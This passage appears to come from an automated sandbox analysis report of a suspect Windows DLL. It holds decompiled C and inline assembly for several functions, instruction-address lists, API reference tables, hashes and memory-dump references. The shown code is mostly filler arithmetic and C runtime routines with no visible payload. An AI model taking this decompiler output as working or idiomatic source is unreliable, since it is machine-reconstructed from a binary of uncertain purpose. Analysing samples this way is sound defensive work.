										asm("movss [esp+0x28], xmm0");
										_t51 = E6E808500(E6E7D5ED0(_t48, 0), _t50);
										asm("cvtsd2ss xmm0, xmm0");
										_t95 = 0;
										asm("movss [esp+0x18], xmm0");
										_t52 = E6E808500(_t51, _t47);
										asm("cvtsd2ss xmm0, xmm0");
										asm("subss xmm0, [esp+0x28]");
										asm("addss xmm0, [esp+0x18]");
										asm("cvttss2si eax, xmm0");
										if(_t52 >= 0x26) {
											if(_t52 < 0x47) {
												goto L13;
											} else {
												E6E7D57C0();
												_t84 = _t52;
												_t67 = E6E808500(_t52, _t52);
												asm("movaps xmm1, xmm0");
												asm("mulsd xmm1, [0x6e8185a8]");
												asm("cvttsd2si eax, xmm1");
												_t58 = _t67;
												asm("movd xmm1, eax");
												asm("cvtdq2pd xmm1, xmm1");
												asm("subsd xmm0, xmm1");
												goto L14;
											}
											goto L43;
										} else {
											GetCommandLineW();
											L13:
											GetTickCount();
											_t84 = E6E7D5ED0(0x2e, _t95);
											E6E808500(_t54, _t54);
											asm("movsd [esp+0x28], xmm0");
											_t56 = GetSystemDefaultLangID();
											asm("movss xmm0, [0x6e8186d8]");
											_t58 = E6E8081CE(_t56);
											asm("movd xmm0, eax");
											asm("cvtdq2pd xmm0, xmm0");
											asm("mulsd xmm0, [esp+0x28]");
										}
										L14:
										asm("movsd xmm1, [0x6e818640]");
										asm("cvttsd2si eax, xmm0");
										asm("movsd [esp+0x28], xmm1");
										if(_t58 == 0x1c) {
											if(_t58 < 7) {
												goto L21;
											} else {
												goto L20;
											}
										} else {
											do {
												GetThreadLocale();
												asm("movsd xmm0, [esp+0x28]");
												asm("mulsd xmm0, xmm0");
												asm("cvtpd2ps xmm0, xmm0");
												asm("cvttss2si ecx, xmm0");
												asm("movss [esp+0x18], xmm0");
												_t63 = E6E7D5ED0(_t84, _t95);
												asm("movss xmm0, [esp+0x18]");
												_t65 = E6E7D5990(_t95, E6E8081CE(_t63), _t95);
												_t115 = _t115 + 8;
												asm("movd xmm0, ecx");
												_t84 = _t63;
												asm("cvtdq2pd xmm0, xmm0");
												asm("movsd [esp+0x28], xmm0");
												_t66 = E6E808500(_t65, _t63);
												asm("cvtsd2ss xmm0, xmm0");
												asm("addss xmm0, [esp+0x18]");
												asm("cvtss2sd xmm0, xmm0");
												asm("addsd xmm0, [esp+0x28]");
												asm("cvttsd2si eax, xmm0");
											} while (_t66 != 0x1c);
											L20:
											GetCurrentThread();
											_t72 = E6E7D5990(_t95, 0x4b, 0);
											_t115 = _t115 + 8;
											if(_t72 != 0x65) {
												L21:
												CreateMenu();
												_t72 = 0xe;
											}
										}
										L42:
									}
									L43:
									_t106 = _v40;
									asm("cdq");
									_t22 = _t72 + _v40;
									asm("adc edx, [esp+0x24]");
								} while (_t22 == 0x4f && _t95 == 0);
								goto L45;
							}
							L46:
							if(_t130 <= 0 && (_t130 < 0 || _t22 < 0xa)) {
								asm("movss xmm1, [esp+0x38]");
								asm("movsd xmm2, [esp+0x50]");
								continue;
							}
							goto L52;
							L45:
							_t130 = _t95;
							goto L46;
						}
					} else {
						_t22 = _a4;
						if(_t22 < 0xa) {
							goto L3;
						}
					}
				}
				L52:
				return _t22;
			}

0x6e7d5990
0x6e7d5996
0x6e7d599e
0x6e7d59a1
0x6e7d59a8
0x6e7d5ec5
0x6e7d59ae
0x6e7d59ae
0x6e7d59bc
0x6e7d59bc
0x6e7d59d0
0x6e7d59d0
0x6e7d59d4
0x6e7d59da
0x6e7d59de
0x6e7d59e1
0x6e7d59e5
0x6e7d59e8
0x6e7d59ec
0x6e7d59f2
0x6e7d59f5
0x6e7d59f9
0x6e7d5a00
0x6e7d5a04
0x6e7d5a08
0x6e7d5a0c
0x6e7d5a10
0x6e7d5a16
0x6e7d5a1b
0x6e7d5a1d
0x6e7d5a26
0x6e7d5a2c
0x6e7d5a31
0x6e7d5a31
0x6e7d5a33
0x6e7d5a3b
0x6e7d5a40
0x6e7d5a45
0x00000000
0x00000000
0x6e7d5a4d
0x6e7d5a53
0x6e7d5a53
0x6e7d5a5c
0x6e7d5a69
0x6e7d5a6d
0x6e7d5a74
0x6e7d5c3e
0x6e7d5c46
0x6e7d5c4e
0x6e7d5c56
0x6e7d5c5d
0x6e7d5c62
0x6e7d5c6a
0x6e7d5c6f
0x6e7d5c71
0x6e7d5c7a
0x6e7d5c87
0x6e7d5c8c
0x6e7d5c91
0x6e7d5c97
0x6e7d5c9d
0x6e7d5ca1
0x6e7d5ca7
0x6e7d5cac
0x6e7d5cb2
0x6e7d5cb6
0x6e7d5cbc
0x6e7d5cc0
0x6e7d5cc5
0x6e7d5ccd
0x6e7d5cd8
0x6e7d5ce0
0x6e7d5ce3
0x6e7d5ce7
0x6e7d5cea
0x6e7d5cee
0x6e7d5cf4
0x6e7d5cf7
0x6e7d5cfd
0x6e7d5d05
0x6e7d5d09
0x6e7d5d0f
0x6e7d5d13
0x6e7d5d1b
0x6e7d5d23
0x6e7d5d29
0x6e7d5d2b
0x6e7d5d2e
0x6e7d5d33
0x6e7d5d37
0x6e7d5d40
0x6e7d5d40
0x6e7d5d42
0x6e7d5d48
0x6e7d5d4e
0x6e7d5d51
0x6e7d5d57
0x6e7d5d5d
0x6e7d5d6a
0x6e7d5d72
0x6e7d5d75
0x6e7d5d78
0x6e7d5d7d
0x6e7d5d80
0x6e7d5d84
0x6e7d5d8a
0x6e7d5d90
0x6e7d5d96
0x6e7d5d9a
0x6e7d5d9e
0x6e7d5d40
0x6e7d5da4
0x6e7d5ec3
0x00000000
0x6e7d5ec3
0x6e7d5dac
0x6e7d5db3
0x6e7d5dae
0x6e7d5dae
0x6e7d5dae
0x6e7d5dbb
0x6e7d5dbf
0x6e7d5dc3
0x6e7d5dce
0x6e7d5dd3
0x6e7d5ddb
0x6e7d5ddf
0x6e7d5de3
0x6e7d5de3
0x6e7d5de7
0x6e7d5ded
0x6e7d5df3
0x6e7d5dff
0x6e7d5e05
0x6e7d5e0d
0x6e7d5e13
0x6e7d5e19
0x6e7d5e1e
0x6e7d5e20
0x6e7d5e20
0x6e7d5e23
0x6e7d5e23
0x6e7d5e32
0x6e7d5e35
0x6e7d5e38
0x6e7d5e3b
0x6e7d5e3e
0x6e7d5e3f
0x6e7d5e41
0x6e7d5e45
0x6e7d5e47
0x6e7d5e50
0x00000000
0x00000000
0x6e7d5e52
0x6e7d5e56
0x6e7d5e58
0x6e7d5e58
0x6e7d5e61
0x6e7d5e63
0x6e7d5e69
0x6e7d5e6f
0x6e7d5e73
0x6e7d5e77
0x6e7d5e7d
0x00000000
0x6e7d5e61
0x6e7d5a7a
0x6e7d5a7a
0x6e7d5a84
0x6e7d5a8b
0x6e7d5a91
0x6e7d5a96
0x6e7d5a9a
0x6e7d5aa2
0x6e7d5ab4
0x6e7d5ab9
0x6e7d5abd
0x6e7d5ac1
0x6e7d5ace
0x6e7d5ad3
0x6e7d5ad7
0x6e7d5adb
0x6e7d5ae1
0x6e7d5ae6
0x6e7d5aea
0x6e7d5af0
0x6e7d5af6
0x6e7d5afc
0x6e7d5bd6
0x00000000
0x6e7d5bdc
0x6e7d5be1
0x6e7d5be6
0x6e7d5be8
0x6e7d5bed
0x6e7d5bf0
0x6e7d5bf8
0x6e7d5bfc
0x6e7d5bff
0x6e7d5c03
0x6e7d5c07
0x00000000
0x6e7d5c07
0x00000000
0x6e7d5b02
0x6e7d5b02
0x6e7d5b08
0x6e7d5b08
0x6e7d5b15
0x6e7d5b17
0x6e7d5b1c
0x6e7d5b22
0x6e7d5b28
0x6e7d5b35
0x6e7d5b38
0x6e7d5b3c
0x6e7d5b40
0x6e7d5b40
0x6e7d5b46
0x6e7d5b46
0x6e7d5b4e
0x6e7d5b52
0x6e7d5b5a
0x6e7d5c12
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7d5b60
0x6e7d5b60
0x6e7d5b60
0x6e7d5b66
0x6e7d5b6c
0x6e7d5b70
0x6e7d5b74
0x6e7d5b78
0x6e7d5b7e
0x6e7d5b83
0x6e7d5b94
0x6e7d5b9c
0x6e7d5ba1
0x6e7d5ba5
0x6e7d5ba7
0x6e7d5bab
0x6e7d5bb1
0x6e7d5bb6
0x6e7d5bba
0x6e7d5bc0
0x6e7d5bc4
0x6e7d5bca
0x6e7d5bce
0x6e7d5c14
0x6e7d5c14
0x6e7d5c23
0x6e7d5c25
0x6e7d5c2b
0x6e7d5c31
0x6e7d5c31
0x6e7d5c37
0x6e7d5c37
0x6e7d5c2b
0x6e7d5e82
0x6e7d5e82
0x6e7d5e88
0x6e7d5e88
0x6e7d5e8f
0x6e7d5e90
0x6e7d5e92
0x6e7d5e96
0x00000000
0x6e7d5a53
0x6e7d5ea5
0x6e7d5ea5
0x6e7d5eae
0x6e7d5eb4
0x00000000
0x6e7d5eba
0x00000000
0x6e7d5ea3
0x6e7d5ea3
0x00000000
0x6e7d5ea3
0x6e7d59b0
0x6e7d59b0
0x6e7d59b6
0x00000000
0x00000000
0x6e7d59b6
0x6e7d59ae
0x6e7d5ec8
0x6e7d5ece

APIs

GetCurrentThread.KERNEL32 ref: 6E7D5A26
GetCurrentThreadId.KERNEL32 ref: 6E7D5A53
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E7D5A64
TlsAlloc.KERNEL32(00000066,?,00000000), ref: 6E7D5A7A
GetCommandLineW.KERNEL32(0000005C,00000058,?,?,?,?,?,?,?,?,?,?,6E7D62BF,0000005C,00000000), ref: 6E7D5B02
GetTickCount.KERNEL32 ref: 6E7D5B08
GetSystemDefaultLangID.KERNEL32(?,?,?,?,?,?,?,?,?,?,6E7D62BF,0000005C,00000000,?,-00000009), ref: 6E7D5B22
GetThreadLocale.KERNEL32(?,?,?,?,?,?,?,?,?,?,6E7D62BF,0000005C,00000000,?,-00000009), ref: 6E7D5B60
GetCurrentThread.KERNEL32 ref: 6E7D5C14
CreateMenu.USER32(?,?,?,?,?,?,?,?,?,?,6E7D62BF,0000005C,00000000,?,-00000009), ref: 6E7D5C31
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E7D5C5D
GetKBCodePage.USER32(00000000,?,-00000009,?,00000066,?,00000000), ref: 6E7D5D40
GetCurrentProcessorNumber.KERNEL32(00000000,?,-00000009,?,00000066,?,00000000), ref: 6E7D5E13
CreateMenu.USER32(?,-00000009,?,00000066,?,00000000), ref: 6E7D5E23
GetSystemDefaultUILanguage.KERNEL32(0000005C,00000058,?,?,?,?,?,?,?,?,?,?,6E7D62BF,0000005C,00000000), ref: 6E7D5E63

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentThread$CreateDefaultMenuSystemUnothrow_t@std@@@__ehfuncinfo$??2@$AllocCodeCommandCountLangLanguageLineLocaleNumberPageProcessorTick
String ID:
API String ID: 3782027070-0
Opcode ID: 0d0c39e9310cace86cb3f1892716c146b5c431fa53713329264eaa2c247ce7c7
Instruction ID: 111c135121c824784af689658cac0d662ebe5c03d118d1edcb818523605de28b
Opcode Fuzzy Hash: 0d0c39e9310cace86cb3f1892716c146b5c431fa53713329264eaa2c247ce7c7
Instruction Fuzzy Hash: 19C13C30D18B05CFD302DFB5954529EB7AAEFDB384F189F2AF445B6071EB2494C98A81

Uniqueness

Uniqueness Score: -1.00%

Function 6E7F723C, Relevance: 22.8, APIs: 15, Instructions: 296
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E6E7F723C(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
				signed int _v8;
				char _v21;
				intOrPtr _v22;
				struct _cpinfo _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				intOrPtr* _v44;
				signed int _v48;
				void* _v52;
				intOrPtr* _v56;
				intOrPtr _v60;
				signed int* _v64;
				signed int* _v68;
				void* _v72;
				char _v76;
				signed int _t101;
				intOrPtr* _t106;
				signed int _t123;
				signed short _t126;
				void* _t130;
				void* _t134;
				void* _t137;
				void* _t138;
				intOrPtr _t139;
				void* _t141;
				signed int _t142;
				intOrPtr* _t143;
				signed char _t160;
				signed char _t165;
				signed int _t166;
				void* _t168;
				signed int _t170;
				intOrPtr _t172;
				void* _t179;
				signed int* _t180;
				signed int* _t181;
				signed int _t182;
				signed char* _t189;
				signed char* _t190;
				void* _t193;
				signed int _t195;
				intOrPtr _t198;
				short* _t210;
				intOrPtr* _t212;
				intOrPtr* _t216;
				signed int _t217;
				signed int _t218;
				void* _t219;
				void* _t220;

				_t101 =  *0x6e81e008; // 0x77dcee0d
				_v8 = _t101 ^ _t218;
				_t212 = _a4;
				_t170 = 0;
				_v56 = _t212;
				_v32 = 0;
				_t172 =  *((intOrPtr*)(_t212 + 0xa8));
				_v36 = 0;
				_v40 = 0;
				_v52 = 0;
				_v76 = _t212;
				_v72 = 0;
				if(_t172 == 0) {
					__eflags =  *(_t212 + 0x8c);
					if( *(_t212 + 0x8c) != 0) {
						asm("lock dec dword [eax]");
					}
					 *(_t212 + 0x8c) = _t170;
					__eflags = 0;
					 *(_t212 + 0x90) = _t170;
					 *_t212 = 0x6e80f228;
					 *((intOrPtr*)(_t212 + 0x94)) = 0x6e80f4a8;
					 *((intOrPtr*)(_t212 + 0x98)) = 0x6e80f628;
					 *((intOrPtr*)(_t212 + 4)) = 1;
					L41:
					return E6E7E440A(_v8 ^ _t218);
				}
				_t106 = _t212 + 8;
				_v44 = 0;
				if( *_t106 != 0) {
					L3:
					_v44 = E6E7FC3A0(_t172, 1, 4);
					E6E7F9268(_t170);
					_v32 = E6E7FC3A0(_t172, 0x180, 2);
					E6E7F9268(_t170);
					_v36 = E6E7FC3A0(_t172, 0x180, 1);
					E6E7F9268(_t170);
					_v40 = E6E7FC3A0(_t172, 0x180, 1);
					E6E7F9268(_t170);
					_t198 = E6E7FC3A0(_t172, 0x101, 1);
					_v52 = _t198;
					E6E7F9268(_t170);
					_t220 = _t219 + 0x3c;
					if(_v44 == _t170 || _v32 == _t170 || _t198 == 0 || _v36 == _t170 || _v40 == _t170) {
						L36:
						E6E7F9268(_v44);
						E6E7F9268(_v32);
						E6E7F9268(_v36);
						E6E7F9268(_v40);
						_t170 = 1;
						__eflags = 1;
						goto L37;
					} else {
						_t123 = _t170;
						do {
							 *(_t123 + _t198) = _t123;
							_t123 = _t123 + 1;
						} while (_t123 < 0x100);
						if(GetCPInfo( *(_t212 + 8),  &_v28) == 0) {
							goto L36;
						}
						_t126 = _v28;
						_t236 = _t126 - 5;
						if(_t126 > 5) {
							goto L36;
						}
						_t28 = _t198 + 1; // 0x1
						_v48 = _t126 & 0x0000ffff;
						_t130 = E6E7FED37(_t198, _t212, _t236, _t170,  *((intOrPtr*)(_t212 + 0xa8)), 0x100, _t28, 0xff, _v36 + 0x81, 0xff,  *(_t212 + 8), _t170);
						_t220 = _t220 + 0x24;
						_t237 = _t130;
						if(_t130 == 0) {
							goto L36;
						}
						_t34 = _t198 + 1; // 0x1
						_t134 = E6E7FED37(_t198, _t212, _t237, _t170,  *((intOrPtr*)(_t212 + 0xa8)), 0x200, _t34, 0xff, _v40 + 0x81, 0xff,  *(_t212 + 8), _t170);
						_t220 = _t220 + 0x24;
						if(_t134 == 0) {
							goto L36;
						}
						if(_v48 <= 1 || _v22 == _t170) {
							L22:
							_v60 = _v32 + 0x100;
							_t137 = E6E7FE9FD(_t170, _t198, _t212, _t243, _t170, 1, _t198, 0x100, _v32 + 0x100,  *(_t212 + 8), _t170);
							_t220 = _t220 + 0x1c;
							if(_t137 == 0) {
								goto L36;
							}
							_t193 = _v32;
							_t138 = _t193 + 0xfe;
							 *_t138 = 0;
							_t179 = _v36;
							_v32 = _t138;
							_t139 = _v40;
							 *(_t179 + 0x7f) = _t170;
							_t180 = _t179 - 0xffffff80;
							 *(_t139 + 0x7f) = _t170;
							_v64 = _t180;
							 *_t180 = _t170;
							_t181 = _t139 + 0x80;
							_v68 = _t181;
							 *_t181 = _t170;
							if(_v48 <= 1 || _v22 == _t170) {
								L32:
								_t182 = 0x3f;
								memcpy(_t193, _t193 + 0x200, _t182 << 2);
								_push(0x1f);
								asm("movsw");
								_t141 = memcpy(_v36, _v36 + 0x100, 0 << 2);
								_push(0x1f);
								asm("movsw");
								asm("movsb");
								_t142 = memcpy(_t141, _t141 + 0x100, 0 << 2);
								asm("movsw");
								asm("movsb");
								_t216 = _v56;
								if( *((intOrPtr*)(_t216 + 0x8c)) != 0) {
									asm("lock xadd [ecx], eax");
									if((_t142 | 0xffffffff) == 0) {
										E6E7F9268( *(_t216 + 0x90) - 0xfe);
										E6E7F9268( *(_t216 + 0x94) - 0x80);
										E6E7F9268( *(_t216 + 0x98) - 0x80);
										E6E7F9268( *((intOrPtr*)(_t216 + 0x8c)));
									}
								}
								_t143 = _v44;
								 *_t143 = 1;
								 *((intOrPtr*)(_t216 + 0x8c)) = _t143;
								 *_t216 = _v60;
								 *(_t216 + 0x90) = _v32;
								 *(_t216 + 0x94) = _v64;
								 *(_t216 + 0x98) = _v68;
								 *(_t216 + 4) = _v48;
								L37:
								E6E7F9268(_v52);
								goto L41;
							} else {
								_t189 =  &_v21;
								while(1) {
									_t160 =  *_t189;
									if(_t160 == 0) {
										break;
									}
									_t217 =  *(_t189 - 1) & 0x000000ff;
									if(_t217 > (_t160 & 0x000000ff)) {
										L30:
										_t189 =  &(_t189[2]);
										if( *(_t189 - 1) != _t170) {
											continue;
										}
										break;
									}
									_t210 = _t193 + 0x100 + _t217 * 2;
									do {
										_t217 = _t217 + 1;
										 *_t210 = 0x8000;
										_t210 = _t210 + 2;
									} while (_t217 <= ( *_t189 & 0x000000ff));
									goto L30;
								}
								goto L32;
							}
						} else {
							_t190 =  &_v21;
							while(1) {
								_t165 =  *_t190;
								if(_t165 == 0) {
									goto L22;
								}
								_t195 =  *(_t190 - 1) & 0x000000ff;
								_t166 = _t165 & 0x000000ff;
								while(_t195 <= _t166) {
									 *((char*)(_t195 + _t198)) = 0x20;
									_t195 = _t195 + 1;
									__eflags = _t195;
									_t166 =  *_t190 & 0x000000ff;
								}
								_t190 =  &(_t190[2]);
								_t243 =  *(_t190 - 1) - _t170;
								if( *(_t190 - 1) != _t170) {
									continue;
								}
								goto L22;
							}
							goto L22;
						}
					}
				}
				_push(_t106);
				_push(0x1004);
				_push(_t172);
				_push(0);
				_push( &_v76);
				_t168 = E6E7FE84B(0, __edx, __edi, _t212);
				_t220 = _t219 + 0x14;
				if(_t168 != 0) {
					goto L36;
				}
				goto L3;
			}

0x6e7f7244
0x6e7f724b
0x6e7f7250
0x6e7f7253
0x6e7f7256
0x6e7f7259
0x6e7f725c
0x6e7f7262
0x6e7f7265
0x6e7f7268
0x6e7f726b
0x6e7f726e
0x6e7f7273
0x6e7f7593
0x6e7f7595
0x6e7f7597
0x6e7f7597
0x6e7f759a
0x6e7f75a0
0x6e7f75a2
0x6e7f75a8
0x6e7f75ae
0x6e7f75b8
0x6e7f75c2
0x6e7f75c9
0x6e7f75d9
0x6e7f75d9
0x6e7f7279
0x6e7f727c
0x6e7f7281
0x6e7f729f
0x6e7f72a9
0x6e7f72ac
0x6e7f72bf
0x6e7f72c2
0x6e7f72d0
0x6e7f72d3
0x6e7f72e1
0x6e7f72e4
0x6e7f72f5
0x6e7f72f8
0x6e7f72fb
0x6e7f7300
0x6e7f7306
0x6e7f755a
0x6e7f755d
0x6e7f7565
0x6e7f756d
0x6e7f7575
0x6e7f757f
0x6e7f757f
0x00000000
0x6e7f732f
0x6e7f732f
0x6e7f7331
0x6e7f7331
0x6e7f7334
0x6e7f7335
0x6e7f734b
0x00000000
0x00000000
0x6e7f7351
0x6e7f7354
0x6e7f7357
0x00000000
0x00000000
0x6e7f7364
0x6e7f7367
0x6e7f7387
0x6e7f738c
0x6e7f738f
0x6e7f7391
0x00000000
0x00000000
0x6e7f73ab
0x6e7f73bb
0x6e7f73c0
0x6e7f73c5
0x00000000
0x00000000
0x6e7f73cf
0x6e7f73fc
0x6e7f7412
0x6e7f7415
0x6e7f741a
0x6e7f741f
0x00000000
0x00000000
0x6e7f7425
0x6e7f742a
0x6e7f7430
0x6e7f7433
0x6e7f7436
0x6e7f7439
0x6e7f743c
0x6e7f743f
0x6e7f7446
0x6e7f7449
0x6e7f744c
0x6e7f744e
0x6e7f7454
0x6e7f7457
0x6e7f7459
0x6e7f749b
0x6e7f749d
0x6e7f74a6
0x6e7f74ab
0x6e7f74ae
0x6e7f74b8
0x6e7f74ba
0x6e7f74bd
0x6e7f74bf
0x6e7f74c8
0x6e7f74ca
0x6e7f74cc
0x6e7f74cd
0x6e7f74d8
0x6e7f74dd
0x6e7f74e1
0x6e7f74ef
0x6e7f7502
0x6e7f7510
0x6e7f751b
0x6e7f7520
0x6e7f74e1
0x6e7f7523
0x6e7f7526
0x6e7f752c
0x6e7f7535
0x6e7f753a
0x6e7f7543
0x6e7f754c
0x6e7f7555
0x6e7f7580
0x6e7f7583
0x00000000
0x6e7f7460
0x6e7f7460
0x6e7f7463
0x6e7f7463
0x6e7f7467
0x00000000
0x00000000
0x6e7f7469
0x6e7f7472
0x6e7f7490
0x6e7f7490
0x6e7f7496
0x00000000
0x00000000
0x00000000
0x6e7f7496
0x6e7f747a
0x6e7f747d
0x6e7f7482
0x6e7f7483
0x6e7f7486
0x6e7f748c
0x00000000
0x6e7f747d
0x00000000
0x6e7f7498
0x6e7f73d6
0x6e7f73d6
0x6e7f73d9
0x6e7f73d9
0x6e7f73dd
0x00000000
0x00000000
0x6e7f73df
0x6e7f73e3
0x6e7f73f0
0x6e7f73e8
0x6e7f73ec
0x6e7f73ec
0x6e7f73ed
0x6e7f73ed
0x6e7f73f4
0x6e7f73f7
0x6e7f73fa
0x00000000
0x00000000
0x00000000
0x6e7f73fa
0x00000000
0x6e7f73d9
0x6e7f73cf
0x6e7f7306
0x6e7f7283
0x6e7f7284
0x6e7f7289
0x6e7f728d
0x6e7f728e
0x6e7f728f
0x6e7f7294
0x6e7f7299
0x00000000
0x00000000
0x00000000

APIs

_free.LIBCMT ref: 6E7F72AC
_free.LIBCMT ref: 6E7F72C2
_free.LIBCMT ref: 6E7F72D3
_free.LIBCMT ref: 6E7F72E4
_free.LIBCMT ref: 6E7F72FB
GetCPInfo.KERNEL32(?,?), ref: 6E7F7343

Part of subcall function 6E7FE84B: _free.LIBCMT ref: 6E7FE8B6

_free.LIBCMT ref: 6E7F74EF
_free.LIBCMT ref: 6E7F7502
_free.LIBCMT ref: 6E7F7510
_free.LIBCMT ref: 6E7F751B
_free.LIBCMT ref: 6E7F755D
_free.LIBCMT ref: 6E7F7565
_free.LIBCMT ref: 6E7F756D
_free.LIBCMT ref: 6E7F7575
_free.LIBCMT ref: 6E7F7583

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 994e02b794f6f96b29e7ab082568a805b5e42ce42a35956485ef76f71c9b3194
Instruction ID: 7f5017eff6657d10b680821770959605d307c2202e358bc7e38a7b84a1c49fc1
Opcode Fuzzy Hash: 994e02b794f6f96b29e7ab082568a805b5e42ce42a35956485ef76f71c9b3194
Instruction Fuzzy Hash: 43B19E71910206EFDB11CFE8C980BEEBBB8FF08304F504569E859A73A1DB759846DB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D96B0, Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 287
memoryCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E6E7D96B0(void* __ebx, intOrPtr* __ecx, signed int __edx, short* __edi, long long __fp0) {
				int _v8;
				char _v12;
				int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				int _v36;
				int _v40;
				int _v44;
				signed int _v48;
				int _v52;
				int _v56;
				signed int _v60;
				int _v64;
				char _v67;
				int _v68;
				int _v72;
				int _v76;
				int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				int _v96;
				int _v100;
				int _v104;
				int _v108;
				int _v112;
				char _v113;
				int _v116;
				int _v120;
				int _v124;
				int _v128;
				int _v132;
				int _v136;
				int _v140;
				int _v144;
				int _v152;
				int _v164;
				char _v168;
				void* _v169;
				int _v176;
				signed int _v180;
				int _v184;
				int _v188;
				int _v192;
				int _v196;
				int _v200;
				int _v204;
				int _v208;
				int _v212;
				int _v216;
				int _v220;
				int _v224;
				int* _v228;
				signed int _v300;
				int _v348;
				int _v388;
				char _v396;
				signed int _v400;
				int _v412;
				intOrPtr* _v464;
				int _v544;
				char _v552;
				signed int _v556;
				int _v564;
				char _v572;
				int _v576;
				signed int _v584;
				short* _v588;
				char _v604;
				signed int _v608;
				char _v628;
				intOrPtr* _v636;
				intOrPtr _v668;
				char _v684;
				signed int _v692;
				char _v1216;
				int _v1220;
				intOrPtr _v1336;
				char _v1352;
				signed int _v1360;
				intOrPtr _v1368;
				int _v1468;
				char _v1476;
				void* __esi;
				void* __ebp;
				signed int _t781;
				signed int _t782;
				intOrPtr _t789;
				signed int _t795;
				signed int _t801;
				signed int _t802;
				int _t804;
				int _t806;
				intOrPtr* _t815;
				signed int _t821;
				signed int _t822;
				int _t825;
				signed int _t828;
				signed int _t829;
				int _t832;
				signed int _t835;
				signed int _t836;
				int _t840;
				int _t843;
				short* _t848;
				intOrPtr _t851;
				signed int _t857;
				signed int _t858;
				int _t859;
				int* _t867;
				int _t868;
				int _t869;
				int* _t875;
				signed int _t881;
				int _t899;
				int _t900;
				int _t901;
				int _t902;
				int _t903;
				int _t905;
				void* _t907;
				int _t909;
				int _t911;
				int _t913;
				int _t915;
				int _t916;
				int _t917;
				int _t918;
				int _t919;
				int _t920;
				int _t922;
				intOrPtr* _t930;
				intOrPtr _t936;
				int _t945;
				int _t949;
				int _t950;
				int _t951;
				int _t954;
				int _t955;
				int _t956;
				int _t958;
				void* _t963;
				int _t964;
				void* _t965;
				int _t966;
				signed int _t967;
				int _t971;
				int _t972;
				int* _t977;
				signed int _t979;
				int _t982;
				int _t983;
				int _t987;
				int _t988;
				int* _t993;
				signed int _t995;
				int _t998;
				int _t1003;
				int _t1004;
				int _t1010;
				int _t1014;
				int _t1015;
				int _t1016;
				int _t1019;
				int _t1020;
				int _t1021;
				int _t1023;
				void* _t1028;
				int _t1029;
				void* _t1030;
				int _t1031;
				void* _t1032;
				int _t1033;
				void* _t1034;
				int _t1035;
				void* _t1036;
				int _t1037;
				void* _t1038;
				int _t1039;
				signed int _t1040;
				int _t1044;
				int _t1045;
				void* _t1050;
				signed int _t1052;
				int _t1055;
				int _t1056;
				int _t1060;
				int _t1061;
				void* _t1066;
				signed int _t1068;
				int _t1071;
				int _t1072;
				int _t1076;
				int _t1077;
				void* _t1082;
				signed int _t1085;
				int _t1088;
				int _t1089;
				int _t1093;
				int _t1094;
				int* _t1099;
				int _t1100;
				signed int _t1101;
				int _t1104;
				int _t1105;
				int _t1109;
				int _t1110;
				int* _t1115;
				int _t1116;
				signed int _t1117;
				int _t1120;
				int _t1121;
				int _t1125;
				int _t1126;
				int* _t1131;
				int _t1132;
				signed int _t1133;
				int _t1136;
				int _t1137;
				int _t1141;
				int _t1142;
				intOrPtr* _t1147;
				intOrPtr* _t1151;
				int _t1156;
				int _t1160;
				int _t1161;
				int _t1162;
				int _t1165;
				int _t1166;
				int _t1169;
				short* _t1171;
				int _t1172;
				int _t1174;
				int _t1175;
				int _t1176;
				int _t1178;
				int _t1185;
				int _t1189;
				int _t1193;
				int _t1207;
				int _t1208;
				int _t1209;
				int _t1211;
				void* _t1216;
				int _t1217;
				void* _t1218;
				int _t1219;
				void* _t1220;
				int _t1221;
				void* _t1222;
				int _t1223;
				void* _t1224;
				int _t1225;
				signed int _t1226;
				int _t1230;
				int _t1231;
				void* _t1236;
				signed int _t1239;
				int _t1242;
				int _t1243;
				int _t1247;
				int _t1248;
				signed int _t1256;
				int _t1259;
				int _t1260;
				int _t1264;
				int _t1265;
				int _t1271;
				void* _t1272;
				signed int _t1273;
				int _t1277;
				int _t1278;
				int _t1282;
				int _t1283;
				int _t1289;
				void* _t1290;
				signed int _t1291;
				int _t1295;
				int _t1296;
				int _t1300;
				int _t1301;
				int* _t1306;
				int _t1307;
				signed int _t1308;
				int _t1311;
				int _t1312;
				int _t1316;
				int _t1317;
				signed int _t1324;
				short* _t1330;
				int _t1331;
				intOrPtr* _t1333;
				int _t1335;
				intOrPtr* _t1337;
				void* _t1344;
				intOrPtr* _t1347;
				intOrPtr* _t1360;
				void* _t1361;
				void* _t1363;
				int _t1367;
				int _t1368;
				int _t1371;
				int _t1372;
				int _t1373;
				int _t1374;
				int _t1375;
				int _t1376;
				intOrPtr* _t1382;
				signed int _t1384;
				signed int* _t1385;
				signed int _t1386;
				int _t1387;
				signed int _t1388;
				signed int _t1389;
				signed int _t1390;
				int* _t1391;
				int _t1392;
				int _t1393;
				intOrPtr* _t1398;
				signed int _t1402;
				intOrPtr _t1405;
				int* _t1414;
				int _t1415;
